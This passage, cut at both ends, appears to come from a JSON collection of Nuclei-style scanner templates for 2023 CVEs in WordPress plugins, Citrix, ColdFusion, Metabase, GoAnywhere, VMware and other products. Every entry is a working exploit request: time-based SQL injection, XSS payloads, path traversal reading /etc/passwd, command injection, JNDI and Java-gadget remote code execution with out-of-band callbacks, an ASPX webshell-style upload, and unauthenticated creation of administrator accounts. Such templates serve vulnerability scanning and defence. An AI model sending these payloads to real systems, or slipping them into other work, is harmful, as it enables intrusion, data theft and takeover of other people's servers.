{{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code 